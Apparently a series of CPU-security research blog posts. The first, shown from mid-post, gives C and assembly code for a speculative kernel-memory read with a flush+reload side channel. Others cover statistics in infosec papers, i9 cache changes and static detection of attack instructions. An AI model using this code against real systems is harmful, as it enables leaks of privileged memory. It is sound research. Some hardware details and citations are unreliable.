into the cache hierarchy, and we will be able to observe a faster access time after structured exception handling has taken care of the exception. To make sure that someusermodeaddress is not already in the cache hierarchy, I can use the clflush instruction before starting the execution. Now only a single additional step is required for us to leak information about the kernel memory:

mov rax, [somekerneladdress]

and rax, 1

mov rbx, [rax + someusermodeaddress]

 

If the last two instructions are executed speculatively, the address loaded differs depending on the value loaded from somekerneladdress, and thus different cache lines may be loaded into the cache. This cache activity we can observe through a flush+reload cache attack.
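A sketch of the flush+reload measurement this relies on – the textbook construction, not my original code; the 100-cycle threshold and the probe layout are illustrative assumptions that need per-machine calibration:

#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

/* One probe line per possible bit value; the 4096-byte stride keeps the
 * two lines on separate pages, away from adjacent-line prefetchers. */
#define STRIDE 4096
static uint8_t probe_area[2 * STRIDE];

static uint64_t reload_time(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

static void flush_probe(void) {
    _mm_clflush(&probe_area[0 * STRIDE]);
    _mm_clflush(&probe_area[1 * STRIDE]);
    _mm_mfence();
}

/* Whichever line reloads fast was touched speculatively. */
static int recover_bit(void) {
    if (reload_time(&probe_area[1 * STRIDE]) < 100) return 1;
    if (reload_time(&probe_area[0 * STRIDE]) < 100) return 0;
    return -1;   /* neither line cached: no signal */
}

int main(void) {
    flush_probe();
    /* In the real attack the speculative code touches one line; here we
     * simulate that architecturally to show the measurement works. */
    (void)*(volatile uint8_t *)&probe_area[1 * STRIDE];
    printf("recovered bit: %d\n", recover_bit());
    return 0;
}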

The first problem we’re facing is that we must make sure the second and third instructions run before the first one retires. We have a race condition we must win. How do we engineer that? We fill the reorder buffer with dependent instructions which use a different execution unit than the ones we need. Then we add the code listed above. The dependency forces the CPU to execute the filling instructions one micro-op at a time. Using an execution unit different from the one used in the leaking code makes sure that the CPU can speculatively execute the leak while working on the fill pattern.

The straightforward fill pattern I use is 300 add reg64, imm instructions; I chose add rax, 0x141. I chose this because we have two execution units able to execute this instruction (the integer ALUs), and since the adds must execute sequentially, one of these units will always be available to my leakage code (provided that another hardware thread in the same core isn’t mixing things up).
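Putting the fill pattern and the leak together, the core of the experiment might look like the following sketch. This is my reconstruction, with kernel_addr as a placeholder for somekernelmodeaddress; note that, unlike the earlier listing, it shifts the leaked bit to a page stride so that the two outcomes touch different lines of the probe array from the previous sketch:

#include <stdint.h>

/* The race setup described above (my reconstruction). Reading
 * kernel_addr faults, but only at retirement, so this must run under
 * the exception handling shown in the evaluation section. */
static inline void leak_once(const void *kernel_addr, const uint8_t *probe) {
    __asm__ volatile(
        /* Fill the reorder buffer with a dependent ALU chain so the
           faulting load retires as late as possible: 300 repetitions
           of add rax, 0x141, as in the text. */
        ".rept 300\n\t"
        "add $0x141, %%rax\n\t"
        ".endr\n\t"
        "mov (%[kaddr]), %%rbx\n\t"       /* faults at retirement        */
        "and $1, %%rbx\n\t"               /* isolate one bit             */
        "shl $12, %%rbx\n\t"              /* bit -> page-sized offset    */
        "mov (%[probe], %%rbx), %%rcx\n"  /* speculative probe touch     */
        :
        : [kaddr] "r"(kernel_addr), [probe] "r"(probe)
        : "rax", "rbx", "rcx", "cc", "memory");
}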

Since my kernel-read mov instruction and my leaking mov instruction must run sequentially, and the data fetched by the leaking instruction cannot be in the cache, the total execution time would be around 400 clock cycles if the kernel address isn’t cached. This is a pretty steep cost given that an add rax, 0x141 costs around 3 clock cycles. For this reason, I see to it that the kernel address I’m accessing is loaded into the cache hierarchy. I use two different methods to ensure that: first, I call a syscall that touches this memory; second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1. Gruss et al. [4] concluded that prefetch instructions may load the cache despite the lack of access rights. Further, they showed that it’s possible for the page table walk to abort, which would surely mean that I’m not getting a result – but having the data already in L1 avoids this walk.
 

All said and done, there are a few assumptions I made about Intel’s implementation of Tomasulo’s algorithm:

1) Speculative execution continues despite the interrupt flag

2) I can win the race condition between speculative execution and retirement

3) I can load caches during speculative execution

4) Data is provided despite the interrupt flag

 

Evaluation

I ran the following tests on my i3-5005u Broadwell CPU.

I found no way to separately test assumptions 1, 2, and 3, so I wrote up the code outlined above, except that instead of the leak sequence I used the following code:

mov rdi, [rdi]            ; where rdi is somekernelmodeaddress

mov rdi, [rdi + rcx + 0]  ; where rcx is someusermodeaddress

Then I timed accessing someusermodeaddress after an exception handler dealt with the resulting exception. I did 1000 runs and sorted the 10 slowest out. First I did a run with the second line above present and the value at the kernel mode address set to 0. I then did a second run with the second line commented out. This allows me to test if I have a side channel inside the speculative execution. The results are summarized in the histogram below (with the second line present: mean = 71.22, std = 3.31; with it commented out: mean = 286.17, std = 53.22). So obviously I have a statistically significant covert channel inside the speculative execution.
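The text above relies on structured exception handling to survive the fault; on POSIX systems an equivalent recovery mechanism can be sketched as follows (my construction; the kernel address is a made-up placeholder typical of x86-64 Linux):

#include <setjmp.h>
#include <signal.h>
#include <stdio.h>

static sigjmp_buf recovery;

static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recovery, 1);   /* resume after the faulting attempt */
}

int main(void) {
    signal(SIGSEGV, segv_handler);
    if (sigsetjmp(recovery, 1) == 0) {
        /* the faulting access, e.g. the mov rdi,[rdi] sequence;
         * the address below is a placeholder kernel address */
        *(volatile char *)0xffff800000000000ull;
    }
    /* control continues here after the handler; time the probe now */
    puts("survived the fault; measure someusermodeaddress here");
    return 0;
}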

 
In a second step, I made sure that the kernel address I was trying to read had the value 4096. Now if I’m actually reading kernel-mode data, the second line will fetch a cache line in the next page, so I would expect a slow access to someusermodeaddress, as the speculative fetch should access a cache line exactly one page further. (I selected the offset 4096 to avoid effects due to hardware prefetchers; otherwise I could’ve used the size of a cache line.) Fortunately, I did not get a slow read, suggesting that Intel nulls the result when the access is not allowed. I double-checked by accessing the cache line I wanted to access, and indeed that address was not loaded into the cache either. Consequently, it seems likely that Intel does process the illegal read of kernel mode memory, but does not copy the result into the reorder buffer. So at this point my experiment has failed – thus the negative result. Being really curious, I added an add rdi, 4096 instruction after the first line in the test code and could verify that this code was indeed executed speculatively and that the result was side-channeled out.

 

Pandoras box

While I did set out to read kernel mode memory without privileges, and that produced a negative result, I do feel like I opened a Pandora’s box. The thing is, there were two positive results in my tests. The first is that Intel’s implementation of Tomasulo’s algorithm is not side channel safe: we have access to the results of speculative execution despite those results never being committed. Secondly, my results demonstrate that speculative execution does indeed continue despite violations of the isolation between kernel mode and user mode.

This is truly bad news for security. First, it gives microarchitectural side channel attacks additional leverage – we can deduce information not only from what is actually executed but also from what is speculatively executed. It also seems likely that we can influence what is speculatively executed and what is not, through influencing structures like the caches and the BTB; see Evtyushkin and Ponomarev [5] for instance. It thus adds another way to increase the expressiveness of microarchitectural side channel attacks, potentially allowing an attacker even more leverage through the CPU. This of course makes writing constant time code even more complex, and thus it is definitely bad news.

It also draws into doubt mitigations that rely on the retirement of instructions. I cannot say I know how far that stretches, but my immediate guess would be that VM exits are handled on instruction retirement. Further, we see that speculative execution does not consistently abide by isolation mechanisms, so it is a haunting question what we can actually do with speculative execution.

 

Literature

[1] Intel. “Intel® 64 and IA-32 Architectures Software Developer Manuals”. https://software.intel.com/en-us/articles/intel-sdm

[2] Tomasulo, Robert M. (Jan 1967). “An Efficient Algorithm for Exploiting Multiple Arithmetic Units”. IBM Journal of Research and Development. IBM. 11 (1): 25–33. ISSN 0018-8646. doi:10.1147/rd.111.0025.

[3] Fogh, Anders. “Covert Shotgun: Automatically finding covert channels in SMT”. https://www.youtube.com/watch?v=oVmPQCT5VkY

[4] Gruss, Daniel, et al. “Prefetch side-channel attacks: Bypassing SMAP and kernel ASLR.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

[5] Evtyushkin, Dmitry, Dmitry Ponomarev, and Nael Abu-Ghazaleh. “Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR.” Proceedings of the 49th International Symposium on Microarchitecture (MICRO). 2016.

Statistics and Infosec

 

Introduction

 

The work by John Ioannidis [1], among others, started the “reproduction crisis”. That phrase describes the situation in many branches of science where researchers have been unable to reproduce classic results which form the basis for our understanding of the world. Since the basic principle of modern science is standing on the shoulders of giants, it is incredibly important that sound methodology is used to ensure that our foundation is solid. For now the reproduction crisis has hardly reached information security, and I hope it will stay that way. But unfortunately the information security scene is full of issues that make it vulnerable to reproduction problems. Top among them are methodology and the lack of reproduction studies. A huge number of papers are accepted as true but never reproduced, and many papers suffer from methodological problems.

 

In this blog post I will argue that, in information security papers, very basic statistics could improve the process and reproducibility. Statistics is important as soon as observed data are noisy, and noisy data are everywhere, even in computer science: users are non-deterministic; unobserved variables, manufacturing variance, temperature, and other environmental influences all affect our measurements. This of course does not mean that we cannot say anything meaningful about computers – it just means we need to embrace statistics, and so far information security has not been very successful at that. The purpose of this blog post is to suggest a baby step in the right direction: using sample size, mean, and standard deviation as a means of improving the exposition of noisy data. I intentionally keep the theory short – I encourage everybody to read a real statistics book. Also, with the intention to provoke, I picked two examples of papers where the statistics could have been done better.

 

Statistics, Sample Size, Mean, and Standard Deviation 101

During a lecture, my first statistics professor said that he would automatically flunk any of us who, in the future, reported on noisy data without mentioning three data points about them: the sample size (N), the mean, and the standard deviation. The first reason for bringing these three data points is that doing so is as close as one gets to a standard in science. It is accepted in other sciences, ranging from physics through medicine to economics. Having a standard for reporting noisy data allows us to compare studies easily and gives us an easy way to reproduce the findings of other people. Unfortunately, this standard appears to not have arrived in full force in information security yet.

But it is not only about a standard. The thing is: using these three values is not just a historical accident; there is sound theory behind why we want them. Imagine a process generating our data – usually called the data generating process, or d.g.p. If the d.g.p. produces observations where the noise is independent of other observations, we say the d.g.p. produces independent, identically distributed (i.i.d.) observations. If observations are not i.i.d., we cannot treat all variation as noise, and consequently we need further analysis before we can draw any conclusion based on the data. Hence, i.i.d. is often assumed or considered a good approximation, and very often there are good reasons to do so.

With i.i.d. data, the arithmetic mean of our observations will almost surely converge towards the mean of the d.g.p. as the number of observations increases. This is called the law of large numbers. If one rolls a die a thousand times and gets an arithmetic mean of 3.0, it is an indication that the die is not fair. This explains why we wish to report the arithmetic mean: if the number of samples is sufficiently high, then the arithmetic mean is “close” to the real mean of the data generating process.

Also, with i.i.d. data the central limit theorem almost always applies. The central limit theorem says that we can expect the mean to tend towards a normal distribution as the sample size increases. The normal distribution is characterized by only two parameters: its mean and its standard deviation. It allows us to test hypotheses about the data – the most basic tests can even be made on the back of an envelope. This allows us to put a probability on the die from the previous example not being fair – that we are not just observing noise.

Why we should include the sample size should be pretty obvious by now: both the law of large numbers and the central limit theorem hinge on convergence in the sample size. Thus, if we have a small sample size, we are unable to rely on any conclusions. That should not surprise you. Imagine throwing a die 3 times, getting 1, 2, and 4 – you would be a fool to insist that your data show that 6 rarely happens. If you have thrown the die a million times and do not see any 6’s, the die almost surely is not fair, and the aforementioned conclusion would be pertinent.

In most first-semester (or second-semester, if applied with rigor) statistics books, you can find a discussion of estimating how many samples you need, based on the estimated standard deviation from a pilot sample or prior knowledge of the d.g.p. That can of course be turned around to evaluate whether a study had a sufficient sample size – yet another reason why these three numbers are valuable. The calculation is sketched below.
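For reference, the standard textbook formula (not taken from the papers discussed here): to estimate a mean to within a margin of error $E$ at confidence level $1-\alpha$, given a pilot estimate $s$ of the standard deviation, one needs roughly

n \ge \left( \frac{z_{\alpha/2}\, s}{E} \right)^2

observations. For example, with $s = 50$ clock cycles, $E = 5$, and 95% confidence ($z_{\alpha/2} \approx 1.96$), this gives $n \approx (1.96 \cdot 50 / 5)^2 \approx 385$ observations.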

In short, three small numbers in a 14-page paper can provide deep insight into the soundness of your methodology, as well as making your paper easily comparable and reproducible. If you are in doubt, you need to bring these three numbers. One word of caution though: I think these numbers are necessary, but they may not be sufficient to describe the data. Also, you will have no quarrel with me if I can easily calculate the standard deviation from the reported data. For example, reporting variance instead of standard deviation, or omitting the standard deviation when reporting on proportions (the Bernoulli distribution is described by its first moment alone), is just fine.

 

Case study 1: A Software Approach to Defeating Side Channels in Last-Level Caches

I will start out with a pretty good paper that could have been even better if standard deviation and mean had been mentioned: “A Software Approach to Defeating Side Channels in Last-Level Caches” by Zhou et al. [2]. The authors develop CacheBar, a method to mitigate cache side channel attacks. Against Flush+Reload attacks they use a copy-on-access implementation to avoid sharing memory, which effectively kills Flush+Reload as an attack vector. I shall concentrate on Zhou et al.’s [2] protection against Prime+Probe. For this purpose, Zhou et al. [2] use an overcommitted page coloring scheme. Overcommitted page coloring allows for significantly more flexible memory allocation, and thus less performance penalty, than the classic page coloring scheme. However, an attacker remains able to prime a cache set to a certain extent. Consequently, the scheme does not defeat Prime+Probe, but it does add noise. The paper analyzes this noise by first grouping observations of defender demand on a cache set into “none, one, few, some, lots, and most” categories. They subsequently train a Bayesian classifier on 500,000 Prime+Probe trials and present the classification results in a custom figure in matrix form. I have no objections thus far; if the authors think that this method of describing the noise provides insight, then that is fine with me. I am, however, missing the standard deviation and mean – they do offer the sample size. Why do I think the paper would have been better if they had printed these two values?

  • The categories are arbitrary: to compare the results to other papers with noise (say, noisy timers) we would have to categorize in exactly the same fashion.
  • With reported means, we would immediately be able to tell if the noise is biased. Bias would show up in the figures as misprediction, but an attacker could adjust for it.
  • With the standard deviation, we could calculate on the back of an envelope how many observations an attacker would need to successfully exfiltrate the information she is after, and thus evaluate whether the mitigation makes attacks impractical in different scenarios. For example, you can get lots of observations of encryption, but you cannot ask a user for his password 10000 times.
  • Reproducing a study will, in the presence of noisy data, always show slight differences. When are the black-and-white matrix figures close enough to be considered a reproduction? For means and standard deviations, that question has been resolved.

That all said, I do not worry about the conclusion of this paper. The sample size is sufficient for the results to hold up, and the paper is generally well written. I think this paper is a significant contribution to our knowledge on defending against cache side channel attacks.

 

Case study 2: CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks

Caveat, Apology and More Information

Before I start with my analysis of the statistics in this paper, I should mention that I have given off-the-cuff comments on this paper before, and I generally stand by what I wrote on that occasion. You will find my comments published in Security Week [6]. I did get one thing wrong in my off-the-cuff remarks: I wrote that Brasser et al. [3] draw heavily on Pessl et al. [4]. Brasser et al. do not use the DRAM mapping function of Pessl et al. [4], as I initially thought they did; instead, they use an ad-hoc specified approximate mapping function. It is also very important to mention that I am referring to an early version of the paper on arXiv; none of this changes the substance of my previous off-the-cuff remarks or of what I write in this blog post. As my critique of the paper is relatively harsh, I emailed the authors ahead of posting this blog post. As of publishing, I have not yet received an answer.

Getting dirty with it

“CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks” by Brasser et al. [3] implements two mitigations for the row hammer problem: B-Catt and G-Catt. G-Catt uses memory partitioning so that the kernel is not co-located in the same banks as user mode memory, which prevents hammering the kernel space from user mode. I am not convinced that G-Catt cannot be circumvented, but that is not the subject of this blog post. I will instead focus on B-Catt. Kim et al. [5] suggested not using vulnerable memory addresses, and B-Catt implements this idea in a boot loader, rather elegantly using int 15h, subfunction 0xe820, which provides the operating system a list of memory regions it should avoid using. If the computer is not using any vulnerable addresses, one cannot flip bits with row hammer, and the system is safe. Obviously, not using some of the physical memory comes at a cost for the end user. Kim et al. [5] concluded: “However, the first/second approaches are ineffective when every row in the module is a victim row (Section 6.3)”. Contrary to this, Brasser et al. [3] conclude: “…we demonstrate that it is an efficient and practical solution that effectively prevents rowhammer attacks as a short-term solution”. So, the big question is who gets it right here. The key issue is how many pages contain bit flips. Kim et al. [5] do not provide numbers on pages, but Brasser et al. do. They evaluate 3 test systems to support their conclusion: “However, our evaluation (Section VI-A2) suggests that only a fraction of rows are vulnerable in practice.”

And this is where my gripe with the statistics in this paper lies. Sometimes you can get away with a tiny sample size: that is when you have prior evidence that the sample variance is either irrelevant or negligible. The relevance of the variance here is a given. The prior evidence of a small variance is not present. In fact, I will argue quite the contrary later.

But first let me get rid of the terribly loose language of “practical and efficient”. My 15 years of experience as a professional software developer tells me that software needs to work as advertised on at least 99% of the systems. That is, in my opinion, a conservative value. Further assume that 5% memory overhead is acceptable for B-Catt users. Notice that I have defined practical as a fraction of systems that must run with an acceptable overhead. The alternative would have been defining practical as a maximal acceptable average overhead. I consider the fraction approach the more applicable one in most real world scenarios – it certainly is easier to do back-of-envelope calculations with, which I will be doing for the remainder of this blog post.

Now we can put the sample size of 3 into perspective. Imagine that in reality 10% of systems have more pages with bit flips than is acceptable. With a sample size of 3, that gives us a 73% (0.9³) chance that our evaluation will be “suggesting” that we are indeed practical, as spelled out below. Being wrong 73% of the time is not a suggestion of being right. We need more data than 3 observations to assume practicality. Obviously, you may argue that my 10% is pulled out of a hat – and it is indeed. It is a conservative number, but not an unrealistic one.
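The back-of-envelope step, written out: if impractical systems occur with probability 0.10, the chance that a sample of 3 contains none of them is

$$P(\text{no impractical system in 3 draws}) = (1 - 0.10)^3 = 0.9^3 \approx 0.73$$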

This leads us to the question of how much data we need. The answer depends on the variance in the data, something that we do not know. So, we can either make an a priori guess based on domain knowledge or do a pilot sample to get an idea. My first semester statistics book [6] states: “We recommend taking at least 20 observations in a pilot sample” (p. 419). So, the authors’ sample does not even qualify as a pilot sample.

So we are left with turning to domain knowledge. Kim et al. [5] have, in my opinion, the best available data. They sample 129 modules but do not mention the number of affected pages. They do, however, mention that 3 modules have more than 40% affected rows. On a two channel Skylake system (to my knowledge the best case) we can have 4 rows per page; assume all bit flips occur so that the smallest number of pages is affected – then we end up with 3 modules out of 129 with at least 10% overhead. Thus no less than 2.3% of modules will have too much overhead, according to my definition, in Kim’s sample. This certainly constitutes a reason for skepticism towards Brasser et al.’s [3] claims.
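Spelled out:

$$\frac{40\%\ \text{affected rows}}{4\ \text{rows per page}} \geq 10\%\ \text{affected pages}, \qquad \frac{3}{129} \approx 2.3\%\ \text{of modules}$$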

Kim et al. [5] unfortunately do not calculate a mean or standard deviation – they do report their complete data, so I could calculate it, but instead I will use a bit of brute force to get somewhere. We know that rowhammer is fairly bad because 6 of 129 samples have more than 1 million bit flips. Assuming that each cell is equally likely to flip, that gives us a 14.8% probability that a given page is vulnerable for any of these 6 modules. This assumption has weak support in Kim et al. [5]. Consequently, at least 4.6% of the modules are not practical under my definition and my fairly conservative assumptions. With a finite base of modules (200), under the assumption that modules are equally common in the wild, and with 129 observations, we can calculate a 95% confidence interval. This confidence interval tells us that between 2.44% and 6.76% of the assumed 200 modules in the population are vulnerable. Obviously, it is not realistic to assume only 200 modules in existence, but if there are more the confidence interval only becomes wider. Thus, under these assumptions we must dismiss that B-Catt is practical, with 95% confidence. It looks like B-Catt is in trouble.
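A plausible reconstruction of that interval is a normal approximation with a finite population correction; my rounding lands close to, but not exactly on, the numbers above:

$$\hat{p} \pm 1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}\cdot\frac{N-n}{N-1}} = 0.0465 \pm 1.96\sqrt{\frac{0.0465 \cdot 0.9535}{129}\cdot\frac{200-129}{200-1}} \approx [2.5\%,\ 6.8\%]$$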

The assumptions above are of course very restrictive, and thus more research is required. What would this research look like? A pilot sample with at least 20 observations would be a good start. Alternatively, we could use my above assumptions to calculate a sample size. If we do, we end up with the number 80.
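One way to arrive at a number of that magnitude is the standard sample-size formula for a proportion. With p = 0.046 (the fraction found above) and a margin of error as large as the estimate itself – parameter choices that are my assumption, not necessarily the authors’ – it lands almost exactly on 80:

$$n = \frac{z_{0.975}^2\, p(1-p)}{E^2} = \frac{1.96^2 \cdot 0.046 \cdot 0.954}{0.046^2} \approx 80$$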

Obviously, everything here rides on my definition of practicality and efficiency. My gut feeling is that B-Catt won’t turn out to be practical if we had a reasonable sample. Nevertheless, I would love to see data on the issue. While I think my assumptions are fair for a mainstream product, there might be special cases where B-Catt may shine. For a data center that can search for a RAM product with few bit flips, B-Catt may very well be a solution.

 

Literature

[1] Ioannidis, John P. A. “Why most published research findings are false.” PLoS Med 2.8 (2005): e124.

[2] Zhou, Ziqiao, Michael K. Reiter, and Yinqian Zhang. “A software approach to defeating side channels in last-level caches.” Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security. ACM, 2016.

[3] Brasser, Ferdinand, et al. “CAn’t Touch This: Practical and Generic Software-only Defenses Against Rowhammer Attacks.” arXiv preprint arXiv:1611.08396 (2016).

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM addressing for cross-CPU attacks.” Proceedings of the 25th USENIX Security Symposium. 2016.

[5] Kim, Yoongu, et al. “Flipping bits in memory without accessing them: An experimental study of DRAM disturbance errors.” ACM SIGARCH Computer Architecture News. Vol. 42. No. 3. IEEE Press, 2014.

[6] Berry, Donald A., and Bernard William Lindgren. Statistics: Theory and Methods. Duxbury Resource Center.

[7] Kovacs, Eduard. “Researchers Propose Software Mitigations for Rowhammer Attacks.” http://www.securityweek.com/researchers-propose-software-mitigations-rowhammer-attacks

New cache architecture on Intel I9 and Skylake server: An initial assessment

 

Intel has introduced the new i9 CPU, which is positioned as a HEDT (High-End DeskTop) product. The micro architecture is in many respects shared with the new Skylake server micro architecture. If history is a guide, technology introduced in this segment slowly trickles down to more budget friendly desktops. From a micro architecture point of view it seems that several things about these CPUs will force changes on micro architectural attacks – especially in the memory subsystem. In this blog post I’ll give a short overview of the relevant changes and the effects they may have on micro architectural attacks. Since I don’t own or have access to an actual i9 or Skylake server processor, this blog post is pure conjecture.

 

Summary of the “old” cache hierarchy

The major change over earlier processors from a micro architecture point of view is that the cache system has received a significant overhaul. Current Intel CPUs have a 3 level cache hierarchy: two very small L1 caches, one for data and one for instructions, and a somewhat larger second level cache (L2 or Mid Latency Cache). L1 data, L1 code and L2 are part of each core and private to it. Finally, Intel CPUs have had a huge 3rd level cache (usually called L3 or last level cache) shared between all cores. The 3rd level cache is subdivided into slices that are logically connected to a core. To effectively share this cache, Intel connected the slices on a ring bus called the Quick Path Interconnect. Further, the 3rd level cache was an inclusive cache, which means that anything cached in L1 or L2 must also be cached in L3.

 

Changes

Some of the important changes that have been announced in the Intel Software Optimization Manual [1] are:

–    A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

–    A reduced over all cache size per core (compared to similar older models)

–    A very significant increase in the size of the L2 (factor of 4)

–    Doubled the bandwidth of L2, while only slightly increasing the latency

–    The larger L2 is slightly more than offset by a reduction of the shared L3

–    Reorganized  L3 cache to be a non-inclusive cache

–    Replaced the QPI with a mesh-style bus

Why do these changes make sense?

Increasing the size of L2 at the cost of L3 makes sense, as the L2 is much faster than L3 for applications – one can only assume that shrinking the L3 helps reduce die size and cost. Also, the increase in the size of the L2 caches reduces the marginal utility of the L3. Finally, as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in L3 is a problem Intel has battled before: with Haswell they introduced Cache Allocation Technology (CAT) to allow software to control cache usage of the L3 and deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring bus design. There is a penalty for having memory served from another core’s slice. On a ring bus this penalty is proportional to how far apart the cores are on the ring. With more cores, this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes at a cost, as the same data is loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of (L2 + L1) to L3 size. Previously this ratio has been around 1:10 (depending on the actual CPU), but multiplying the L2 size by 4 while making the L3 a tiny bit smaller brings the ratio to about 1:1.5, as the rough numbers below illustrate. Thus, making the L3 cache non-inclusive is essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive, meaning the content of L3 cannot be loaded in L1 and L2. I think Intel would have used the defined term exclusive if the cache really were exclusive. Thus, it is probably fair to assume that non-inclusive means that data may or may not be cached in L1, L2 and L3 at the same time, but exactly how this is governed is important. Unfortunately there is no information available on this.
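With rough per-core sizes (my ballpark figures, not from the manual) the two ratios come out close to the ones quoted above:

$$\text{old: } \frac{L1 + L2}{L3} \approx \frac{64\,\text{KB} + 256\,\text{KB}}{2.5\,\text{MB}} \approx 1\!:\!8, \qquad \text{new: } \frac{64\,\text{KB} + 1\,\text{MB}}{1.375\,\text{MB}} \approx 1\!:\!1.3$$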

It’s worth noting that many of these changes have been tested and developed by Intel for the Knights Landing micro architecture. Knights Landing is a high throughput micro architecture, sold in relatively small volumes. Thus, it’s likely that many features developed for this CPU will trickle down. It’ll be interesting to see if Intel plans to bring them to laptops/small desktops or use different cache designs for different classes of CPUs.

 

Effects

Cache side channel attacks

This new cache layout is likely to have a profound effect on cache side channel attacks. I think Flush+Reload will keep working even without an inclusive L3. The flush primitive is based on the CLFlush instruction, which is part of the instruction set architecture (ISA). Intel has been very reluctant in the past to change the ISA, and therefore my estimate is that flushing will work as always. I think the reload primitive will remain effective too – I find it likely that an uncached load will also load data into the shared L3. It is also likely that the QPI replacement bus can be used to fetch data from private L2 caches, similar to AMD’s cross-CPU transmission. This would give Flush+Reload a flush+transfer flavor, but it would still work. For more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled in some way, we can be fairly certain that at least one of these things is true, if not both. The latter is my guess.
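For reference, a minimal Flush+Reload round in C; the shared-memory setup and threshold calibration are left out, and the intrinsics are the usual GCC/Clang ones:

#include <stdint.h>
#include <x86intrin.h>

/* One Flush+Reload round on a shared address: a fast reload means the
   victim touched the cache line since we last flushed it. */
static uint64_t reload_time(const void *addr)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    *(volatile const uint8_t *)addr;   /* reload the line              */
    uint64_t t1 = __rdtscp(&aux);
    _mm_clflush(addr);                 /* flush again for next round   */
    return t1 - t0;                    /* below threshold => cache hit */
}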

The big changes are likely to be related to the evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can load data into another core’s private hierarchy. Thus, the prime and evict primitives probably won’t work for cross core attacks. However, both are likely to work decently within a core (hyper threading or scheduling on the same core).

While the ISA behavior of CLFlush is almost certain to remain unchanged, the micro architecture below it will see significant changes. With QPI gone, using the Flush+Flush attack by Gruss et al. [3] to find out how many hops on the ring bus you are away from a particular slice almost certainly won’t work. This does not mean that you won’t find a side channel in CLFlush: buses are typically bandwidth limited and thus an obvious source of congestion – without an inclusive L3 the bus bandwidth might even be easier to saturate. Also, the Flush+Flush attack as a Flush+Reload replacement is likely to produce a different timing behavior in the new micro architecture. My guess up front is that a timing difference, and thus a side channel, remains.

Also affected by the non-inclusiveness of the L3 are row buffer side channel attacks such as those presented by Pessl et al. [4]. Without effective eviction, cross core attacks may be severely stifled. The ability to reverse engineer the DRAM complex mapping function is likely to remain unchanged, as it hinges not on eviction but on the CLFlush instruction’s ISA behavior.

With the CLFlush instruction and eviction likely still working on local cores, row hammer will remain effective. But in some scenarios, indirect effects of the micro architecture changes may break specific attacks, such as that of Bhattacharya & Mukhopadhyay [5]. The reason is that such attacks rely on information leakage through the caches, which becomes more difficult to leverage as described above.

 

Future

While the changes to the cache make sense with the significant number of cores in the affected systems, it seems unlikely that the changes will trickle down to notebooks and laptops. With only two cores, the existing cache design seems sensible. Thus, we are likely to see a two-tier cache design going forward.

Conclusion

Having a non-inclusive L3 cache is significantly more secure from a side channel perspective than an inclusive one in cross core scenarios. This opens the door to defending against these attacks by isolating different security domains on different cores, potentially dynamically. While Flush+Reload is likely to be unaffected, this attack is also the easiest to thwart in real life scenarios, as avoiding shared memory across security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these micro architecture changes.

 

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.

[3] Gruss, Daniel, et al. “Flush+ Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

MASScan & the Problems of Static Detection of Microarchitectural attacks

 

Introduction

Microarchitectural attacks have been known for more than a decade now. The designs behind those architectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause of these vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort, Irazoqui et al. [1] published an interesting paper on static methods to detect microarchitectural attacks, titled “MASScan: Stopping Microarchitectural Attacks Before Execution”.
The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to changes.

 

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. In this case, ‘attack context’ is defined as code which is either required for an attack to work or which improves an attack’s performance. The list is:

Cache flushing instructions

Clflush, clflushopt
(the authors do not mention clflushopt, but I have included it for completeness)

Non-temporal instructions

movnti & movntdq

Timers

Counter threads, performance counters, rdtscp and rdtsc instructions, and attempts to set thread affinity to gain core co-location, which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instruction

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop

 

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Z0mbie’s [5] opcode list (which unfortunately is outdated at the time of writing) 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the authors’ notion.

